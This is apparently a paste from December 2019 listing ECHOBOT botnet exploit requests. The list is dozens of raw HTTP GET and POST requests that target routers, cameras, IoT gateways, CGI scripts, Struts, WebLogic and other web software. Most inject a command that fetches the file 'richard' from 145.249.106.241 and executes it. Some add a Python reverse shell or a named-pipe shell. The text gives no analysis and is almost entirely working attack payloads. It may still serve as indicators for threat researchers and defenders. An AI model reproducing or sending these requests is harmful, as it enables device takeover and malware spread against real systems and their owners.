
New ECHOBOT payload list: HTTP exploit requests, most of which download and run the file `richard` from 145.249.106.241

a guest
Dec 12th, 2019
  1. POST /portal/apis/aggrecate_js.cgi?script=launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22 HTTP/1.0
  2. Content-Length: 630
  3. Accept-Encoding: gzip, deflate
  4. Accept: /
  5. User-Agent: Hello-World
  6. Connection: keep-alive
  7.  
  8. POST /stainfo.cgi?ifname=eth0;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  9.  
  10. GET /cgi-bin/masterCGI?ping=nomip&user=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  11.  
  12. GET /cgi-bin/script?wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  13.  
  14. GET /cgi-bin/test?iperf=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  15. Host: %s:80
  16.  
  17. GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&pingCNT=5 HTTP/1.0
  18. Host: 192.168.0.1:80
  19. Connection: keep-alive
  20. Pragma: no-cache
  21. Cache-Control: no-cache
  22. Upgrade-Insecure-Requests: 1
  23. Connection: keep-alive
  24. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  25. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  26. Referer: http://www.target.com/Main_Analysis_Content.asp
  27. Accept-Encoding: gzip, deflate
  28. Accept-Language: en-US,en;q=0.9
  29.  
  30. GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&pingCNT=5 HTTP/1.0
  31. Host: 192.168.1.1:80
  32. Proxy-Connection: keep-alive
  33. Authorization: Basic ZGVmYXVsdA==
  34. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  35. User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
  36. Referer: http://192.168.1.1/Main_Analysis_Content.asp
  37. Accept-Encoding: gzip,deflate,sdch
  38. Accept-Language: en-US,en;q=0.8
  39.  
  40. POST /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.0
  41. Host: %s:8080
  42. "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
  43.  
  44. GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;echo%20YYY;').exit().%24a[ HTTP/1.0
  45. sort=].phpinfo().exit().$a[
  46. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  47. Connection: Close
  48.  
  49. GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;echo%20YYY;echo| HTTP/1.0
  50. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  51. Connection: Close
  52.  
  53. GET /cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;echo%20YYY;echo|awstats HTTP/1.0
  54. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  55. Connection: Close
  56.  
  57. GET /cgi-bin/img.pl?f=etc/hosts&f=%Q!bin/sh -c echo 'YYY';wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard; echo 'YYY'|! HTTP/1.0
  58.  
  59. GET /cgi-bin/preview_email.cgi?file=/mail/mlog/|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  60. Host: %s:80
  61.  
  62. POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.0
  63. User-Agent: Hello-World
  64. Host: 192.168.0.1:5120
  65. Content-type: text/xml; charset=utf-8
  66. SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write
  67. M-SEARCH * HTTP/1.1
  68. HOST: 239.255.255.250:1900
  69. MAN: ssdp:discover
  70. MX: 3
  71. ST: upnp:rootdevice
  72. <?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>
  73.  
  74. POST /upnp/control/basicevent1 HTTP/1.0
  75. Host: %s:49152
  76. Connection: keep-alive
  77. Accept-Encoding: gzip, deflate Accept: */*
  78. User-Agent: python-requests/2.18.4
  79. SOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo
  80. Content-Length: 393
  81. <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body><u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1"> <SmartDevURL>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</SmartDevURL> </u:SetSmartDevInfo> </s:Body> </s:Envelope>
  82.  
  83. GET /cgi-bin/operator/servetest?cmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  84. Authorization: Basic YWRtaW46YWRtaW4=
  85. Server: Boa/0.94.14rc21
  86. Accept-Ranges: bytes
  87. Connection: close
  88. Content-type: text/plain
  89.  
  90. POST /cgi-bin/file_transfer.cgi?file_transfer=new&dir='Pa_Note;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;Pa_Note HTTP/1.0
  91. Content-Type: application/x-www-form-urlencoded
  92.  
  93. GET /ccbill/whereami.cgi?g=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  94. Host: %s:80
  95.  
  96. POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % 99999; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  97. 'SSL_CLIENT_VERIFY' : 'SUCCESS'
  98. get_package_fil:
  99. site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active
  100.  
  101. POST /web/cgi-bin/usbinteract.cgi?action=7&path="|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard|| HTTP/1.0
  102. Host: 192.168.0.1:9000
  103. Content-Length: 155
  104. Content-Type: application/x-www-form-urlencoded
  105.  
  106. POST /dogfood/mail/spell.php?data=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  107.  
  108. POST /apps/a3/cfg_ethping.cgi?MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%26 HTTP/1.0
  109.  
  110. POST /cgi-bin/;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  111.  
  112. POST /service/krashrpt.php?kuid=`id | wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard` HTTP/1.0
  113. Host: 192.168.0.1:80
  114. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
  115. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  116. Accept: /
  117. User-Agent: Hello-World
  118. Accept-Language: en-US,en;q=0.5
  119. Accept-Encoding: gzip, deflate
  120. Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
  121. Connection: close
  122. Upgrade-Insecure-Requests: 1
  123. Content-Type: application/x-www-form-urlencoded
  124. Content-Length: 37
  125.  
  126. POST /soap.cgi?service=WANIPConn1 HTTP/1.0
  127. Content-Length: 649
  128. Host: 10.8.28.133:49152
  129. Content-Type: text/xml
  130. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  131. <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription></NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>
  132.  
  133. GET /webadmin/script?command=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  134.  
  135. POST /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 HTTP/1.0
  136. Host: %s:80
  137. {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://%s/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
  138.  
  139. GET /recordings/misc/callme_page.php?action=c&callmenum=@from-internal/n%0D%0AApplication:%20system%0D%0AData:wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard HTTP/1.0
  140.  
  141. GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard HTTP/1.0
  142.  
  143. POST /uapi-cgi/viewer/admin/testaction.cgi?&type=ip&ip=eth0%20wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard|ping%20-c%203%201.1.1.1|x HTTP/1.0
  144. Content-Length: 630
  145. Accept-Encoding: gzip, deflate
  146. Accept: /
  147. User-Agent: Hello-World
  148. Connection: keep-alive
  149.  
  150. GET /api/project/repo/log/graph/%60cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60 HTTP/1.0
  151.  
  152. POST /api/backup/logout.cgi?sid=aa;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  153. Content-type: text/html
  154.  
  155. GET /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  156.  
  157. POST /html/SetSmarcardSettings.php?HidChannelID=2&HidcmbBook=0&cmbBook=0|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08
  158. HTTP/1.0
  159. Content-Length: 11660
  160. Content-Type: application/x-www-form-urlencoded
  161. Connection: close
  162. X-Powered-By: PHP/5.5.13
  163. User-Agent: joxypoxy/7.2.6
  164.  
  165. GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard aux&message= HTTP/1.0
  166. Host: 192.168.1.1:80
  167. Authorization: Basic YWRtaW46YWRtaW4=
  168.  
  169. GET /awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%22%26 HTTP/1.0
  170.  
  171. GET /nagios/cgi-bin/statuswml.cgi?ping=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  172.  
  173. POST /u/jsp/tools/exec.jsp?command=cmd+%2Fc+ping&argument=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%7C+whoami&async_output=ping1487856455258&isWindows=true HTTP/1.0
  174. Host: %s:8081
  175. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0
  176. Accept: */*
  177. Accept-Language: en-US,en;q=0.5
  178. Accept-Encoding: gzip, deflate
  179. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  180. X-Requested-With: XMLHttpRequest
  181. Referer: http://%s:8081/u/index.jsp
  182. Content-Length: 97
  183. Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF
  184. Connection: close
  185. Pragma: no-cache
  186. Cache-Control: no-cache
  187.  
  188. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;%27 HTTP/1.0
  189.  
  190. POST /global_data?Cookie:CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7; HTTP/1.0
  191. Host: %s:443
  192. Connection:close
  193.  
  194. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;%27 HTTP/1.0
  195. Host: 192.168.0.1:50000
  196. Connection: keep-alive
  197. Cache-Control: max-age=0
  198. Upgrade-Insecure-Requests: 1
  199. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  200. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  201. Accept-Encoding: gzip, deflate
  202. Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
  203. Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
  204.  
  205. GET /scripts/rpc.php?action=updatetime&timeserver=||wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  206.  
  207. GET /utility.cgi?testType=1&IP=aaa || wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  208. Host: %s:80
  209.  
  210. POST /op5config/welcome?do=do=Login&password=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  211. Connection: Close
  212.  
  213. GET /monitor/op5/nacoma/command_test.php?cmd_str=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  214.  
  215. GET /OvCgi/connectedNodes.ovpl?node=a|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  216.  
  217. POST /_async/AsyncResponseServiceHttps HTTP/1.0
  218. Accept-Encoding: gzip, deflate
  219. Accept: */*
  220. Accept-Language: en
  221. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  222. User-Agent: Hello-World
  223. Connection: close
  224. Content-Type: text/xml
  225. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService" <soapenv:Header>
  226. <wsa:Action>xx</wsa:Action>
  227. <wsa:RelatesTo>xx</wsa:RelatesTo>
  228. </work:WorkContext> xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
  229.  
  230. POST /moadmin/moadmin.php?object=1;system(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard);exit HTTP/1.0
  231. Host: 192.168.0.1:80
  232. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0
  233. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  234. Accept-Language: en-US,en;q=0.5
  235. Accept-Encoding: gzip, deflate
  236. DNT: 1
  237. Connection: keep-alive
  238. Pragma: no-cache
  239. Cache-Control: no-cache
  240. Content-Type: application/x-www-form-urlencoded
  241. Content-Length: 34
  242.  
  243. GET /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  244.  
  245. POST /parse_xml.cgi?filename=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  246. Content-Length:
  247. Content-Type: application/x-www-form-urlencoded
  248.  
  249. POST /users/%2f/%2fproc%2fself%2fcomm?<%=`wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard`%> HTTP/1.0
  250. Content-Type: multipart/form-data; boundary=
  251.  
  252. POST /wanipcn.xml HTTP/1.0
  253. Content-Length: 630
  254. Accept-Encoding: gzip, deflate
  255. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  256. Accept: /
  257. User-Agent: Hello-World
  258. Connection: keep-alive
  259. <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
  260.  
  261. GET /repository/annotate?rev=`wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard` HTTP/1.0
  262. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  263. Connection: Close
  264.  
  265. POST /SGPAdmin/fileRequest?&invoker=&title=&params=&id=&cmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&source=&query= HTTP/1.0
  266.  
  267. GET /goform/formSysCmd?sysCmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;&apply=Apply&submit-url=/syscmd.asp&msg= HTTP/1.0
  268.  
  269. GET /index.php?plot=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  270. Host: %s:80
  271.  
  272. POST cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;&ping_count=1&action=Apply&html_view=ping HTTP/1.0
  273.  
  274. GET /action.php?host:;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&PingCheck=Test HTTP/1.0
  275. Host: %s:80
  276.  
  277. GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60end HTTP/1.0
  278. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  279. Connection: Close
  280.  
  281. GET /qsrserver/device/getThumbnail?sourceUri=
  282. +-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2>&1+|+;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard; > /tmp/f&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&=1537275717150 HTTP/1.0
  283.  
  284. GET /mnt_ping.cgi?isSubmit=1&addrType=3&pingAddr=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&send=Send HTTP/1.0
  285.  
  286. POST /page/maintenance/lanSettings/dns?dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60 HTTP/1.0
  287. Host: 192.168.0.1:80
  288. Content-Length: 64
  289. Accept: */*
  290. Origin: http://192.168.0.1
  291. X-Requested-With: XMLHttpRequest
  292. User-Agent: Testingus/1.0
  293. Content-Type: application/x-www-form-urlencoded
  294. Referer: http://192.168.0.1/maintenance
  295. Accept-Language: en-US,en;q=0.8,mk;q=0.6
  296. Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
  297. Connection: close
  298.  
  299. GET /VhttpdMgr?action=importFile&fileName=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  300. Host: %s:80
  301.  
  302. POST /smartdomuspad/modules/reporting/track_import_export.php?op=export&language=english&interval=1&object_id=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  303. Host: 192.168.0.1
  304. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
  305. Accept: /
  306. Accept-Language: en-US,en;q=0.5
  307. Accept-Encoding: gzip, deflate
  308. Connection: close
  309. Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
  310. Content-Type: application/x-www-form-urlencoded
  311. Content-Length: 86
  312.  
  313. POST /upnp/control/hag HTTP/1.0
  314. Host: %s:49451
  315. Accept: text/javascript, text/html, application/xml, text/xml, */*
  316. Accept-Language: en-us,en;q=0.5
  317. Accept-Encoding: gzip, deflate
  318. X-Requested-With: XMLHttpRequest
  319. X-Prototype-Version: 1.7
  320. Content-Type: text/xml;charset=UTF-8
  321. MIME-Version: 1.0
  322. Content-Length: 311
  323. Connection: keep-alive
  324. Pragma: no-cache
  325. SOAPAction: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua
  326. <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard)</Code> </u:RunLua></s:Body></s:Envelope>
  327.  
  328. POST /scripts/ajaxPortal.lua?destination=8.8.8.8$(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic&destination=8.8.8.8$(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic HTTP/1.0
  329. User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
  330. Accept: application/json, text/javascript, */*; q=0.01
  331. Accept-Language: en-US,en;q=0.5
  332. Accept-Encoding: gzip, deflate
  333. Referer: https://www.vmware.com
  334. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  335. X-Requested-With: XMLHttpRequest
  336. Cookie: culture=en-us
  337. Connection: close
  338.  
  339. POST /password_change.cgi?user=root&pam=&expired=2&old=AkkuS%7cwget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%20&new1=akkuss&new2=akkuss HTTP/1.0
  340. Host: %s:10000
  341. cookie:redirect=1; testing=1; sid=x; sessiontest=1
  342. Content-Type:application/x-www-form-urlencoded
  343.  
  344. POST /cgi-bin/rdfs.cgi?Client=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;&Download=submit HTTP/1.0
  345. Host: 192.168.0.1:80
  346. application/x-www-form-urlencoded
  347. Content-Length: 1024
  348.  
  349. GET /cgi-bin/ccbill/whereami.cgi?g=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  350. Host: %s:80
  351.  
  352. GET /system.ini?loginuse&loginpas HTTP/1.0
  353.  
  354. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget http://145.249.106.241/richard; chmod +x richard; sh richard)&dir=/&mode=PORT&upload_interval=0 HTTP/1.0
  355.  
  356. GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s HTTP/1.0
  357.  
  358. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0 HTTP/1.0
  359.  
  360. POST /actionHandler/ajax_network_diagnostic_tools.php?test_connectivity=true&destination_address=www.comcast.net || wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard; &count1=4 HTTP/1.0
  361. Host: 10.0.0.1:80
  362. User-Agent:
  363. Accept: application/json, text/javascript, */*; q=0.01
  364. Accept-Language: en-US,en;q=0.5
  365. Accept-Encoding: gzip, deflate
